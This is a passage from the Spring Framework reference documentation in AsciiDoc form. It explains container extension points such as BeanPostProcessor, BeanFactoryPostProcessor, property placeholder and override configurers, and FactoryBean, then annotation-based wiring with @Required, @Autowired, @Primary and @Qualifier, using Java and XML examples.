postProcessAfterInitialization(Object bean,\n\t\t\t\tString beanName) throws BeansException {\n\t\t\tSystem.out.println(\"Bean '\" + beanName + \"' created : \" + bean.toString());\n\t\t\treturn bean;\n\t\t}\n\n\t}\n----\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:lang=\"http:\/\/www.springframework.org\/schema\/lang\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n\t\t\thttp:\/\/www.springframework.org\/schema\/lang\n\t\t\thttp:\/\/www.springframework.org\/schema\/lang\/spring-lang.xsd\">\n\n\t\t<lang:groovy id=\"messenger\"\n\t\t\t\tscript-source=\"classpath:org\/springframework\/scripting\/groovy\/Messenger.groovy\">\n\t\t\t<lang:property name=\"message\" value=\"Fiona Apple Is Just So Dreamy.\"\/>\n\t\t<\/lang:groovy>\n\n\t\t<!--\n\t\twhen the above bean (messenger) is instantiated, this custom\n\t\tBeanPostProcessor implementation will output the fact to the system console\n\t\t-->\n\t\t<bean class=\"scripting.InstantiationTracingBeanPostProcessor\"\/>\n\n\t<\/beans>\n----\n\nNotice how the `InstantiationTracingBeanPostProcessor` is simply defined. It does not\neven have a name, and because it is a bean it can be dependency-injected just like any\nother bean. (The preceding configuration also defines a bean that is backed by a Groovy\nscript. The Spring dynamic language support is detailed in the chapter entitled\n<<dynamic-language>>.)\n\nThe following simple Java application executes the preceding code and configuration:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport org.springframework.context.ApplicationContext;\n\timport org.springframework.context.support.ClassPathXmlApplicationContext;\n\timport org.springframework.scripting.Messenger;\n\n\tpublic final class Boot {\n\n\t\tpublic static void main(final String[] args) throws Exception {\n\t\t\tApplicationContext ctx = new ClassPathXmlApplicationContext(\"scripting\/beans.xml\");\n\t\t\tMessenger messenger = (Messenger) ctx.getBean(\"messenger\");\n\t\t\tSystem.out.println(messenger);\n\t\t}\n\n\t}\n----\n\nThe output of the preceding application resembles the following:\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\nBean 'messenger' created : org.springframework.scripting.groovy.GroovyMessenger@272961\norg.springframework.scripting.groovy.GroovyMessenger@272961\n----\n\n\n[[beans-factory-extension-bpp-examples-rabpp]]\n==== Example: The RequiredAnnotationBeanPostProcessor\n\nUsing callback interfaces or annotations in conjunction with a custom\n`BeanPostProcessor` implementation is a common means of extending the Spring IoC\ncontainer. An example is Spring's `RequiredAnnotationBeanPostProcessor` - a\n`BeanPostProcessor` implementation that ships with the Spring distribution which ensures\nthat JavaBean properties on beans that are marked with an (arbitrary) annotation are\nactually (configured to be) dependency-injected with a value.\n\n\n\n[[beans-factory-extension-factory-postprocessors]]\n=== Customizing configuration metadata with a BeanFactoryPostProcessor\n\nThe next extension point that we will look at is the\n`org.springframework.beans.factory.config.BeanFactoryPostProcessor`. The semantics of\nthis interface are similar to those of the `BeanPostProcessor`, with one major\ndifference: `BeanFactoryPostProcessor` operates on the __bean configuration metadata__;\nthat is, the Spring IoC container allows a `BeanFactoryPostProcessor` to read the\nconfiguration metadata and potentially change it __before__ the container instantiates\nany beans other than ``BeanFactoryPostProcessor``s.\n\nYou can configure multiple ``BeanFactoryPostProcessor``s, and you can control the order in\nwhich these ``BeanFactoryPostProcessor``s execute by setting the `order` property.\nHowever, you can only set this property if the `BeanFactoryPostProcessor` implements the\n`Ordered` interface. If you write your own `BeanFactoryPostProcessor`, you should\nconsider implementing the `Ordered` interface too. Consult the javadocs of the\n`BeanFactoryPostProcessor` and `Ordered` interfaces for more details.\n\n[NOTE]\n====\nIf you want to change the actual bean __instances__ (i.e., the objects that are created\nfrom the configuration metadata), then you instead need to use a `BeanPostProcessor`\n(described above in <<beans-factory-extension-bpp>>). While it is technically possible\nto work with bean instances within a `BeanFactoryPostProcessor` (e.g., using\n`BeanFactory.getBean()`), doing so causes premature bean instantiation, violating the\nstandard container lifecycle. This may cause negative side effects such as bypassing\nbean post processing.\n\nAlso, ``BeanFactoryPostProcessor``s are scoped __per-container__. This is only relevant if\nyou are using container hierarchies. If you define a `BeanFactoryPostProcessor` in one\ncontainer, it will __only__ be applied to the bean definitions in that container. Bean\ndefinitions in one container will not be post-processed by ``BeanFactoryPostProcessor``s\nin another container, even if both containers are part of the same hierarchy.\n====\n\nA bean factory post-processor is executed automatically when it is declared inside an\n`ApplicationContext`, in order to apply changes to the configuration metadata that\ndefine the container. Spring includes a number of predefined bean factory\npost-processors, such as `PropertyOverrideConfigurer` and\n`PropertyPlaceholderConfigurer`. A custom `BeanFactoryPostProcessor` can also be used,\nfor example, to register custom property editors.\n\n[[null]]\n\nAn `ApplicationContext` automatically detects any beans that are deployed into it that\nimplement the `BeanFactoryPostProcessor` interface. It uses these beans as bean factory\npost-processors, at the appropriate time. You can deploy these post-processor beans as\nyou would any other bean.\n\n[NOTE]\n====\nAs with ``BeanPostProcessor``s , you typically do not want to configure\n``BeanFactoryPostProcessor``s for lazy initialization. If no other bean references a\n`Bean(Factory)PostProcessor`, that post-processor will not get instantiated at all.\nThus, marking it for lazy initialization will be ignored, and the\n`Bean(Factory)PostProcessor` will be instantiated eagerly even if you set the\n`default-lazy-init` attribute to `true` on the declaration of your `<beans \/>` element.\n====\n\n\n[[beans-factory-placeholderconfigurer]]\n==== Example: the Class name substitution PropertyPlaceholderConfigurer\n\nYou use the `PropertyPlaceholderConfigurer` to externalize property values from a bean\ndefinition in a separate file using the standard Java `Properties` format. Doing so\nenables the person deploying an application to customize environment-specific properties\nsuch as database URLs and passwords, without the complexity or risk of modifying the\nmain XML definition file or files for the container.\n\nConsider the following XML-based configuration metadata fragment, where a `DataSource`\nwith placeholder values is defined. The example shows properties configured from an\nexternal `Properties` file. At runtime, a `PropertyPlaceholderConfigurer` is applied to\nthe metadata that will replace some properties of the DataSource. The values to replace\nare specified as __placeholders__ of the form `${property-name}` which follows the Ant \/\nlog4j \/ JSP EL style.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean class=\"org.springframework.beans.factory.config.PropertyPlaceholderConfigurer\">\n\t\t<property name=\"locations\" value=\"classpath:com\/foo\/jdbc.properties\"\/>\n\t<\/bean>\n\n\t<bean id=\"dataSource\" destroy-method=\"close\"\n\t\t\tclass=\"org.apache.commons.dbcp.BasicDataSource\">\n\t\t<property name=\"driverClassName\" value=\"${jdbc.driverClassName}\"\/>\n\t\t<property name=\"url\" value=\"${jdbc.url}\"\/>\n\t\t<property name=\"username\" value=\"${jdbc.username}\"\/>\n\t\t<property name=\"password\" value=\"${jdbc.password}\"\/>\n\t<\/bean>\n----\n\nThe actual values come from another file in the standard Java `Properties` format:\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\njdbc.driverClassName=org.hsqldb.jdbcDriver\njdbc.url=jdbc:hsqldb:hsql:\/\/production:9002\njdbc.username=sa\njdbc.password=root\n----\n\nTherefore, the string `${jdbc.username}` is replaced at runtime with the value 'sa', and\nthe same applies for other placeholder values that match keys in the properties file.\nThe `PropertyPlaceholderConfigurer` checks for placeholders in most properties and\nattributes of a bean definition. Furthermore, the placeholder prefix and suffix can be\ncustomized.\n\nWith the `context` namespace introduced in Spring 2.5, it is possible to configure\nproperty placeholders with a dedicated configuration element. One or more locations can\nbe provided as a comma-separated list in the `location` attribute.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<context:property-placeholder location=\"classpath:com\/foo\/jdbc.properties\"\/>\n----\n\nThe `PropertyPlaceholderConfigurer` not only looks for properties in the `Properties`\nfile you specify. By default it also checks against the Java `System` properties if it\ncannot find a property in the specified properties files. You can customize this\nbehavior by setting the `systemPropertiesMode` property of the configurer with one of\nthe following three supported integer values:\n\n* __never__ (0): Never check system properties\n* __fallback__ (1): Check system properties if not resolvable in the specified\n properties files. This is the default.\n* __override__ (2): Check system properties first, before trying the specified\n properties files. This allows system properties to override any other property source.\n\nConsult the `PropertyPlaceholderConfigurer` javadocs for more information.\n\n[TIP]\n====\nYou can use the `PropertyPlaceholderConfigurer` to substitute class names, which is\nsometimes useful when you have to pick a particular implementation class at runtime. For\nexample:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean class=\"org.springframework.beans.factory.config.PropertyPlaceholderConfigurer\">\n\t\t<property name=\"locations\">\n\t\t\t<value>classpath:com\/foo\/strategy.properties<\/value>\n\t\t<\/property>\n\t\t<property name=\"properties\">\n\t\t\t<value>custom.strategy.class=com.foo.DefaultStrategy<\/value>\n\t\t<\/property>\n\t<\/bean>\n\n\t<bean id=\"serviceStrategy\" class=\"${custom.strategy.class}\"\/>\n----\n\nIf the class cannot be resolved at runtime to a valid class, resolution of the bean\nfails when it is about to be created, which is during the `preInstantiateSingletons()`\nphase of an `ApplicationContext` for a non-lazy-init bean.\n====\n\n\n[[beans-factory-overrideconfigurer]]\n==== Example: the PropertyOverrideConfigurer\n\nThe `PropertyOverrideConfigurer`, another bean factory post-processor, resembles the\n`PropertyPlaceholderConfigurer`, but unlike the latter, the original definitions can\nhave default values or no values at all for bean properties. If an overriding\n`Properties` file does not have an entry for a certain bean property, the default\ncontext definition is used.\n\nNote that the bean definition is __not__ aware of being overridden, so it is not\nimmediately obvious from the XML definition file that the override configurer is being\nused. In case of multiple `PropertyOverrideConfigurer` instances that define different\nvalues for the same bean property, the last one wins, due to the overriding mechanism.\n\nProperties file configuration lines take this format:\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\nbeanName.property=value\n----\n\nFor example:\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\ndataSource.driverClassName=com.mysql.jdbc.Driver\ndataSource.url=jdbc:mysql:mydb\n----\n\nThis example file can be used with a container definition that contains a bean called\n__dataSource__, which has __driver__ and __url__ properties.\n\nCompound property names are also supported, as long as every component of the path\nexcept the final property being overridden is already non-null (presumably initialized\nby the constructors). In this example...\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\nfoo.fred.bob.sammy=123\n----\n\n... the `sammy` property of the `bob` property of the `fred` property of the `foo` bean\nis set to the scalar value `123`.\n\n[NOTE]\n====\nSpecified override values are always __literal__ values; they are not translated into\nbean references. This convention also applies when the original value in the XML bean\ndefinition specifies a bean reference.\n====\n\nWith the `context` namespace introduced in Spring 2.5, it is possible to configure\nproperty overriding with a dedicated configuration element:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<context:property-override location=\"classpath:override.properties\"\/>\n----\n\n\n\n[[beans-factory-extension-factorybean]]\n=== Customizing instantiation logic with a FactoryBean\n\nImplement the `org.springframework.beans.factory.FactoryBean` interface for objects that\n__are themselves factories__.\n\nThe `FactoryBean` interface is a point of pluggability into the Spring IoC container's\ninstantiation logic. If you have complex initialization code that is better expressed in\nJava as opposed to a (potentially) verbose amount of XML, you can create your own\n`FactoryBean`, write the complex initialization inside that class, and then plug your\ncustom `FactoryBean` into the container.\n\nThe `FactoryBean` interface provides three methods:\n\n* `Object getObject()`: returns an instance of the object this factory creates. The\n instance can possibly be shared, depending on whether this factory returns singletons\n or prototypes.\n* `boolean isSingleton()`: returns `true` if this `FactoryBean` returns singletons,\n `false` otherwise.\n* `Class getObjectType()`: returns the object type returned by the `getObject()` method\n or `null` if the type is not known in advance.\n\nThe `FactoryBean` concept and interface is used in a number of places within the Spring\nFramework; more than 50 implementations of the `FactoryBean` interface ship with Spring\nitself.\n\nWhen you need to ask a container for an actual `FactoryBean` instance itself instead of\nthe bean it produces, preface the bean's id with the ampersand symbol ( `&`) when\ncalling the `getBean()` method of the `ApplicationContext`. So for a given `FactoryBean`\nwith an id of `myBean`, invoking `getBean(\"myBean\")` on the container returns the\nproduct of the `FactoryBean`; whereas, invoking `getBean(\"&myBean\")` returns the\n`FactoryBean` instance itself.\n\n\n\n\n[[beans-annotation-config]]\n== Annotation-based container configuration\n\n.Are annotations better than XML for configuring Spring?\n****\nThe introduction of annotation-based configurations raised the question of whether this\napproach is 'better' than XML. The short answer is __it depends__. The long answer is\nthat each approach has its pros and cons, and usually it is up to the developer to\ndecide which strategy suits them better. Due to the way they are defined, annotations\nprovide a lot of context in their declaration, leading to shorter and more concise\nconfiguration. However, XML excels at wiring up components without touching their source\ncode or recompiling them. Some developers prefer having the wiring close to the source\nwhile others argue that annotated classes are no longer POJOs and, furthermore, that the\nconfiguration becomes decentralized and harder to control.\n\nNo matter the choice, Spring can accommodate both styles and even mix them together.\nIt's worth pointing out that through its <<beans-java,JavaConfig>> option, Spring allows\nannotations to be used in a non-invasive way, without touching the target components\nsource code and that in terms of tooling, all configuration styles are supported by the\nhttps:\/\/spring.io\/tools\/sts[Spring Tool Suite].\n****\n\nAn alternative to XML setups is provided by annotation-based configuration which rely on\nthe bytecode metadata for wiring up components instead of angle-bracket declarations.\nInstead of using XML to describe a bean wiring, the developer moves the configuration\ninto the component class itself by using annotations on the relevant class, method, or\nfield declaration. As mentioned in <<beans-factory-extension-bpp-examples-rabpp>>, using\na `BeanPostProcessor` in conjunction with annotations is a common means of extending the\nSpring IoC container. For example, Spring 2.0 introduced the possibility of enforcing\nrequired properties with the <<beans-required-annotation,@Required>> annotation. Spring\n2.5 made it possible to follow that same general approach to drive Spring's dependency\ninjection. Essentially, the `@Autowired` annotation provides the same capabilities as\ndescribed in <<beans-factory-autowire>> but with more fine-grained control and wider\napplicability. Spring 2.5 also added support for JSR-250 annotations such as\n`@PostConstruct`, and `@PreDestroy`. Spring 3.0 added support for JSR-330 (Dependency\nInjection for Java) annotations contained in the javax.inject package such as `@Inject`\nand `@Named`. Details about those annotations can be found in the\n<<beans-standard-annotations,relevant section>>.\n[NOTE]\n====\nAnnotation injection is performed __before__ XML injection, thus the latter\nconfiguration will override the former for properties wired through both approaches.\n====\nAs always, you can register them as individual bean definitions, but they can also be\nimplicitly registered by including the following tag in an XML-based Spring\nconfiguration (notice the inclusion of the `context` namespace):\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:context=\"http:\/\/www.springframework.org\/schema\/context\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\/spring-context.xsd\">\n\n\t\t<context:annotation-config\/>\n\n\t<\/beans>\n----\n\n(The implicitly registered post-processors include\n{api-spring-framework}\/beans\/factory\/annotation\/AutowiredAnnotationBeanPostProcessor.html[`AutowiredAnnotationBeanPostProcessor`],\n {api-spring-framework}\/context\/annotation\/CommonAnnotationBeanPostProcessor.html[`CommonAnnotationBeanPostProcessor`],\n {api-spring-framework}\/orm\/jpa\/support\/PersistenceAnnotationBeanPostProcessor.html[`PersistenceAnnotationBeanPostProcessor`],\nas well as the aforementioned\n{api-spring-framework}\/beans\/factory\/annotation\/RequiredAnnotationBeanPostProcessor.html[`RequiredAnnotationBeanPostProcessor`].)\n\n[NOTE]\n====\n`<context:annotation-config\/>` only looks for annotations on beans in the same\napplication context in which it is defined. This means that, if you put\n`<context:annotation-config\/>` in a `WebApplicationContext` for a `DispatcherServlet`,\nit only checks for `@Autowired` beans in your controllers, and not your services. See\n<<mvc-servlet>> for more information.\n====\n\n\n\n[[beans-required-annotation]]\n=== @Required\n\nThe `@Required` annotation applies to bean property setter methods, as in the following\nexample:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t@Required\n\t\tpublic void setMovieFinder(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nThis annotation simply indicates that the affected bean property must be populated at\nconfiguration time, through an explicit property value in a bean definition or through\nautowiring. The container throws an exception if the affected bean property has not been\npopulated; this allows for eager and explicit failure, avoiding ``NullPointerException``s\nor the like later on. It is still recommended that you put assertions into the bean\nclass itself, for example, into an init method. Doing so enforces those required\nreferences and values even when you use the class outside of a container.\n\n\n\n[[beans-autowired-annotation]]\n=== @Autowired\n\n[NOTE]\n====\nJSR 330's `@Inject` annotation can be used in place of Spring's `@Autowired` annotation\nin the examples below. See <<beans-standard-annotations,here>> for more details.\n====\n\nYou can apply the `@Autowired` annotation to constructors:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\tprivate final CustomerPreferenceDao customerPreferenceDao;\n\n\t\t@Autowired\n\t\tpublic MovieRecommender(CustomerPreferenceDao customerPreferenceDao) {\n\t\t\tthis.customerPreferenceDao = customerPreferenceDao;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\n[NOTE]\n====\nAs of Spring Framework 4.3, the `@Autowired` constructor is no longer necessary if the\ntarget bean only defines one constructor. If several constructors are available, at\nleast one must be annotated to teach the container which one it has to use.\n====\n\nAs expected, you can also apply the `@Autowired` annotation to \"traditional\" setter\nmethods:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t@Autowired\n\t\tpublic void setMovieFinder(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nYou can also apply the annotation to methods with arbitrary names and\/or multiple\narguments:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\tprivate MovieCatalog movieCatalog;\n\n\t\tprivate CustomerPreferenceDao customerPreferenceDao;\n\n\t\t@Autowired\n\t\tpublic void prepare(MovieCatalog movieCatalog,\n\t\t\t\tCustomerPreferenceDao customerPreferenceDao) {\n\t\t\tthis.movieCatalog = movieCatalog;\n\t\t\tthis.customerPreferenceDao = customerPreferenceDao;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nYou can apply `@Autowired` to fields as well and even mix it with constructors:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\tprivate final CustomerPreferenceDao customerPreferenceDao;\n\n\t\t@Autowired\n\t\tprivate MovieCatalog movieCatalog;\n\n\t\t@Autowired\n\t\tpublic MovieRecommender(CustomerPreferenceDao customerPreferenceDao) {\n\t\t\tthis.customerPreferenceDao = customerPreferenceDao;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIt is also possible to provide __all__ beans of a particular type from the\n`ApplicationContext` by adding the annotation to a field or method that expects an array\nof that type:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\t@Autowired\n\t\tprivate MovieCatalog[] movieCatalogs;\n\n\t\t\/\/ ...\n\n\t}\n----\n\nThe same applies for typed collections:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\tprivate Set<MovieCatalog> movieCatalogs;\n\n\t\t@Autowired\n\t\tpublic void setMovieCatalogs(Set<MovieCatalog> movieCatalogs) {\n\t\t\tthis.movieCatalogs = movieCatalogs;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\n[TIP]\n====\nYour beans can implement the `org.springframework.core.Ordered` interface or either use\nthe `@Order` or standard `@Priority` annotation if you want items in the array or list\nto be sorted into a specific order.\n====\n\nEven typed Maps can be autowired as long as the expected key type is `String`. The Map\nvalues will contain all beans of the expected type, and the keys will contain the\ncorresponding bean names:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\tprivate Map<String, MovieCatalog> movieCatalogs;\n\n\t\t@Autowired\n\t\tpublic void setMovieCatalogs(Map<String, MovieCatalog> movieCatalogs) {\n\t\t\tthis.movieCatalogs = movieCatalogs;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nBy default, the autowiring fails whenever __zero__ candidate beans are available; the\ndefault behavior is to treat annotated methods, constructors, and fields as\nindicating __required__ dependencies. This behavior can be changed as demonstrated below.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t@Autowired(required=false)\n\t\tpublic void setMovieFinder(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\n[NOTE]\n====\nOnly __one annotated constructor per-class__ can be marked as __required__, but multiple\nnon-required constructors can be annotated. In that case, each is considered among the\ncandidates and Spring uses the __greediest__ constructor whose dependencies can be\nsatisfied, that is the constructor that has the largest number of arguments.\n\n`@Autowired`'s __required__ attribute is recommended over the `@Required` annotation.\nThe __required__ attribute indicates that the property is not required for autowiring\npurposes, the property is ignored if it cannot be autowired. `@Required`, on the other\nhand, is stronger in that it enforces the property that was set by any means supported\nby the container. If no value is injected, a corresponding exception is raised.\n====\n\nYou can also use `@Autowired` for interfaces that are well-known resolvable\ndependencies: `BeanFactory`, `ApplicationContext`, `Environment`, `ResourceLoader`,\n`ApplicationEventPublisher`, and `MessageSource`. These interfaces and their extended\ninterfaces, such as `ConfigurableApplicationContext` or `ResourcePatternResolver`, are\nautomatically resolved, with no special setup necessary.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\t@Autowired\n\t\tprivate ApplicationContext context;\n\n\t\tpublic MovieRecommender() {\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\n[NOTE]\n====\n`@Autowired`, `@Inject`, `@Resource`, and `@Value` annotations are handled by Spring\n`BeanPostProcessor` implementations which in turn means that you __cannot__ apply these\nannotations within your own `BeanPostProcessor` or `BeanFactoryPostProcessor` types (if\nany). These types must be 'wired up' explicitly via XML or using a Spring `@Bean` method.\n====\n\n\n[[beans-autowired-annotation-primary]]\n=== Fine-tuning annotation-based autowiring with @Primary\n\nBecause autowiring by type may lead to multiple candidates, it is often necessary to have\nmore control over the selection process. One way to accomplish this is with Spring's\n`@Primary` annotation. `@Primary` indicates that a particular bean should be given\npreference when multiple beans are candidates to be autowired to a single-valued\ndependency. If exactly one 'primary' bean exists among the candidates, it will be the\nautowired value.\n\nLet's assume we have the following configuration that defines `firstMovieCatalog` as the\n_primary_ `MovieCatalog`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class MovieConfiguration {\n\n\t\t@Bean\n\t\t**@Primary**\n\t\tpublic MovieCatalog firstMovieCatalog() { ... }\n\n\t\t@Bean\n\t\tpublic MovieCatalog secondMovieCatalog() { ... }\n\n\t\t\/\/ ...\n\n\t}\n----\n\nWith such configuration, the following `MovieRecommender` will be autowired with the\n`firstMovieCatalog`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\t@Autowired\n\t\tprivate MovieCatalog movieCatalog;\n\n\t\t\/\/ ...\n\n\t}\n----\n\n\nThe corresponding bean definitions appear as follows.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:context=\"http:\/\/www.springframework.org\/schema\/context\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\/spring-context.xsd\">\n\n\t\t<context:annotation-config\/>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\" **primary=\"true\"**>\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t\t<bean id=\"movieRecommender\" class=\"example.MovieRecommender\"\/>\n\n\t<\/beans>\n----\n\n\n[[beans-autowired-annotation-qualifiers]]\n=== Fine-tuning annotation-based autowiring with qualifiers\n\n`@Primary` is an effective way to use autowiring by type with several instances when one\nprimary candidate can be determined. When more control over the selection process is\nrequired, Spring's `@Qualifier` annotation can be used. You can associate qualifier values\nwith specific arguments, narrowing the set of type matches so that a specific bean is\nchosen for each argument. In the simplest case, this can be a plain descriptive value:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\t@Autowired\n\t\t**@Qualifier(\"main\")**\n\t\tprivate MovieCatalog movieCatalog;\n\n\t\t\/\/ ...\n\n\t}\n----\n\nThe `@Qualifier` annotation can also be specified on individual constructor arguments or\nmethod parameters:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\tprivate MovieCatalog movieCatalog;\n\n\t\tprivate CustomerPreferenceDao customerPreferenceDao;\n\n\t\t@Autowired\n\t\tpublic void prepare(**@Qualifier(\"main\")**MovieCatalog movieCatalog,\n\t\t\t\tCustomerPreferenceDao customerPreferenceDao) {\n\t\t\tthis.movieCatalog = movieCatalog;\n\t\t\tthis.customerPreferenceDao = customerPreferenceDao;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nThe corresponding bean definitions appear as follows. The bean with qualifier value\n\"main\" is wired with the constructor argument that is qualified with the same value.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:context=\"http:\/\/www.springframework.org\/schema\/context\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\/spring-context.xsd\">\n\n\t\t<context:annotation-config\/>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t\t**<qualifier value=\"main\"\/>**\n\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t\t**<qualifier value=\"action\"\/>**\n\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t\t<bean id=\"movieRecommender\" class=\"example.MovieRecommender\"\/>\n\n\t<\/beans>\n----\n\nFor a fallback match, the bean name is considered a default qualifier value. Thus you\ncan define the bean with an id \"main\" instead of the nested qualifier element, leading\nto the same matching result. However, although you can use this convention to refer to\nspecific beans by name, `@Autowired` is fundamentally about type-driven injection with\noptional semantic qualifiers. This means that qualifier values, even with the bean name\nfallback, always have narrowing semantics within the set of type matches; they do not\nsemantically express a reference to a unique bean id. Good qualifier values are \"main\"\nor \"EMEA\" or \"persistent\", expressing characteristics of a specific component that are\nindependent from the bean `id`, which may be auto-generated in case of an anonymous bean\ndefinition like the one in the preceding example.\n\nQualifiers also apply to typed collections, as discussed above, for example, to\n`Set<MovieCatalog>`. In this case, all matching beans according to the declared\nqualifiers are injected as a collection. This implies that qualifiers do not have to be\nunique; they rather simply constitute filtering criteria. For example, you can define\nmultiple `MovieCatalog` beans with the same qualifier value \"action\", all of which would\nbe injected into a `Set<MovieCatalog>` annotated with `@Qualifier(\"action\")`.\n\n[TIP]\n====\nIf you intend to express annotation-driven injection by name, do not primarily use\n`@Autowired`, even if is technically capable of referring to a bean name through\n`@Qualifier` values. Instead, use the JSR-250 `@Resource` annotation, which is\nsemantically defined to identify a specific target component by its unique name, with\nthe declared type being irrelevant for the matching process. `@Autowired` has rather\ndifferent semantics: After selecting candidate beans by type, the specified String\nqualifier value will be considered within those type-selected candidates only, e.g.\nmatching an \"account\" qualifier against beans marked with the same qualifier label.\n\nFor beans that are themselves defined as a collection\/map or array type, `@Resource`\nis a fine solution, referring to the specific collection or array bean by unique name.\nThat said, as of 4.3, collection\/map and array types can be matched through Spring's\n`@Autowired` type matching algorithm as well, as long as the element type information\nis preserved in `@Bean` return type signatures or collection inheritance hierarchies.\nIn this case, qualifier values can be used to select among same-typed collections,\nas outlined in the previous paragraph.\n\nAs of 4.3, `@Autowired` also considers self references for injection, i.e. references\nback to the bean that is currently injected. Note that self injection is a fallback;\nregular dependencies on other components always have precedence. In that sense, self\nreferences do not participate in regular candidate selection and are therefore in\nparticular never primary; on the contrary, they always end up as lowest precedence.\nIn practice, use self references as a last resort only, e.g. for calling other methods\non the same instance through the bean's transactional proxy: Consider factoring out\nthe affected methods to a separate delegate bean in such a scenario. Alternatively,\nuse `@Resource` which may obtain a proxy back to the current bean by its unique name.\n\n`@Autowired` applies to fields, constructors, and multi-argument methods, allowing for\nnarrowing through qualifier annotations 